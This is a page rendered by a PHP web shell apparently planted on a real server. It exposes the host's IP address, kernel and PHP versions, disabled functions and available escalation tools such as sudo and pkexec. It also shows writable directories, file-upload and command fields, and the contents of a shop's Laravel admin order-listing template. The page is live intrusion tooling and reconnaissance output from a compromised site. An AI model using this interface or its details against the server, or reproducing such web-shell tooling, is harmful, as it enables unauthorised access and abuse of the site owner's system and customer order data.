403Webshell
Server IP : 103.161.17.216  /  Your IP : 216.73.216.1
Web Server : nginx/1.18.0
System : Linux tipsysaigoncharming 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User : www-data ( 33)
PHP Version : 7.4.3-4ubuntu2.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/thanhtraspa.vn/editthanhtra/editlayout/admin/order/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/thanhtraspa.vn/editthanhtra/editlayout/admin/order/manage_order.blade.php
@extends('admin_layout')
 @section('admin_content')
 <div class="table-agile-info">
  <div class="panel panel-default">
    <div class="panel-heading">
     Liệt kê đơn hàng
    </div>
    <div class="row w3-res-tb">
      
      
      
      </div>
    </div>
    <div class="table-responsive">
       <?php
    $message = Session::get('message');if ($message) {
        echo '<span class="text-alert">',$message,'</span>';
        Session::put('message',null);
            // code...
        }
    
    ?>
      <table class="table table-striped b-t b-light">
        <thead>
          <tr>
           
    

           <th>STT </th>
            <th>Mã Đơn Hàng </th>
            <th>Thời gian đặt</th>
            <th>Trạng Thái Đơn Hàng</th>
            <th style="width:30px;"></th>
          </tr>
        </thead>
        <tbody>
         @php $i=0;@endphp
          @foreach($order as $key => $ord)
          <tr>
            <td>{{$i+=1}}</td>
            <td>{{$ord -> order_code}}</td>
            <td>{{$ord -> created_at}}</td>
             <td>@if($ord -> order_status==1) 
              <p style="color: red;">Đơn Hàng Mới 
                @elseif($ord -> order_status==2)
             <p style="color: green;">Đã Xử Lý</p>   
                @elseif($ord -> order_status==3)

             <p style="color: purple;"> Hủy đơn hàng </p>              
                @endif


            </td>
            
            <td>
              <a href="{{URL::to('/view-order/'.$ord->order_code)}}" class="active styling edit" ui-toggle-class=""><i class="fa fa-eye"></i></a>

               <a onclick="return confirm('bạn có chắc muốn xóa không?')" href="{{URL::to('/delete-order/'.$ord->order_id)}}" class="active" ui-toggle-class=""> <i class="fa fa-times text-danger text"></i></a>

            </td>
          </tr>
       @endforeach
        </tbody>
      </table>
    </div>
  </div>
</div>
</section>
 

@endsection

Youez - 2016 - github.com/yon3zu
LinuXploit